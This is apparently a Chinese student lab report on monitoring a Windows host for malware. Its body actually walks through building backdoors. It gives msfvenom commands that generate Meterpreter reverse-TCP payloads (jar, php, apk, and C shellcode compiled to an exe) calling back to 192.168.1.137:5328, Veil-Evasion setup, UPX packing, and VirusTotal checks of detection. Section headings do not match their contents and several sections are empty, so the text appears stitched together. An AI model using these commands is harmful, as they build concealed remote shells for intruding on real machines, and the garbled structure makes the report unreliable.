目录

• 一、实验目标
• 二、思考题
  • （一）如果在工作中怀疑一台主机上有恶意代码，但只是猜想，所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些，用什么方法来监控。
  • （二）如果已经确定是某个程序或进程有问题，你有什么工具可以进一步得到它的哪些信息。
• 三、实践过程
  • （一）使用schtasks指令监控系统
  • （二）使用sysmon工具监控系统
  • （三）使用VirusTotal分析恶意软件
  • （四）使用Process Monitor分析恶意软件
  • （五）使用Process Explorer分析恶意软件
  • （六）使用PEiD分析恶意软件
  • （七）使用PEiD分析恶意软件
• 四、实践总结与体会
• 五、参考资料

---

一、实验目标

1、是监控你自己系统的运行状态，看有没有可疑的程序在运行。
2、分析一个恶意软件，就分析Exp2或Exp3中生成后门软件；分析工具尽量使用原生指令或sysinternals,systracer套件。
3、假定将来工作中你觉得自己的主机有问题，就可以用实验中的这个思路，先整个系统监控看能不能找到可疑对象，再对可疑对象进行进一步分析，好确认其具体的行为与性质。

二、思考题

（一）如果在工作中怀疑一台主机上有恶意代码，但只是猜想，所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些，用什么方法来监控。

1、使用一些工具帮助自己监测系统，可以实时监控电脑上的端口信息，如果某个进程启动的时候连接了一些看起来很可疑的端口，就可以进一步进行分析。
2、使用windows自带的schtasks指令设置一个计划任务，每隔一定的时间对主机的联网记录等进行记录，如果自己的电脑没有联网的情况下出现了ip访问记录就可以进一步分析了。
3、通过sysmon监控计算机中的重要操作，可以在事件查看器中找到相关日志进行查看。

（二）如果已经确定是某个程序或进程有问题，你有什么工具可以进一步得到它的哪些信息。

1、利用wireshark动态分析程序动向，监视其与主机进行的通信过程。
2、利用systracer工具分析恶意软件。
3、利用PE explorer工具对程序调用库等信息进行分析查看，还可以对其反汇编。

三、实践过程

（一）使用schtasks指令监控系统

1、C盘建立一个netstatlog.bat文件，用来将记录的联网结果格式化输出到netstatlog.txt文件中
netstatlog.bat：

date /t >> c:\netstatlog.txt
time /t >> c:\netstatlog.txt
netstat -bn >> c:\netstatlog.txt

2、在CMD下，使用schtasks /create /TN netstat5303 /sc MINUTE /MO 5 /TR "cmd /c netstat -bn > c:\netstatlog.txt"命令创建计划任务netstat5303

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 x> 5328_backdoor_java.jar

图jar
3、生成php文件，并用VirusTotal进行扫描

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 x> 5328_backdoor.php

图php
4、生成apk文件，并用VirusTotal进行扫描

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 R> 5328_backdoor.apk

图apk

（二）使用sysmon工具监控系统

安装veil-evasion的时候照着Veil-Evasion下载、安装、使用教程上的步骤安装还算比较顺利，就是真的好慢，装了n个小时。
图Veli安装
图Veli1

1、启动evail-evasion
图启动

2、设置好回连的IP地址和端口号后，生成后门文件
图

3、用VirusTotal进行扫描
图Veil扫描

（三）使用VirusTotal分析恶意软件

1、对（一）1中的5328_backdoor.exe进行加壳

upx 5328_backdoor.exe -o 5328_backdoor_upx.exe

图upx（额，显示文件太小）

2、对（一）1中的met-encoded10.exe进行加壳

upx met-encoded10.exe -o met-encoded10_upx.exe

图upx1（加壳成功）

3、用VirusTotal进行扫描
图upx扫描（发现加壳之后被查出的概率增加了【捂脸】）

（四）使用Process Monitor分析恶意软件

1、在kali主机下，进入终端，执行指令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=5328 -f c生成一个c语言格式的Shellcode数组
图生成Shellcod

2、创建一个C文件：shellcode_5328.c，将上面生成的数组copy到该文件下，并加入一个主函数
图c文件

3、使用i686-w64-mingw32-g++ shellcode_5328.c -o shellcode_5328_backdoor.exe命令将该C语言代码shellcode_5328.c转换为一个可在64位windows系统下操作的可执行文件shellcode_5328_backdoor.exe
图转化

4、用VirusTotal进行扫描
图shellcode扫描

5、将可执行文件放到主机上检测
图主机shellcode检测（可以发现这个文件刚放到主机上，就立即被查杀了）

（五）使用Process Explorer分析恶意软件

（六）使用PEiD分析恶意软件

（七）使用PEiD分析恶意软件

四、实践总结与体会

五、参考资料

免杀原理与实践
杀毒软件工作原理 及 现在主要杀毒技术
Veil-Evasion下载、安装、使用教程
kali安装veil和apt基本命令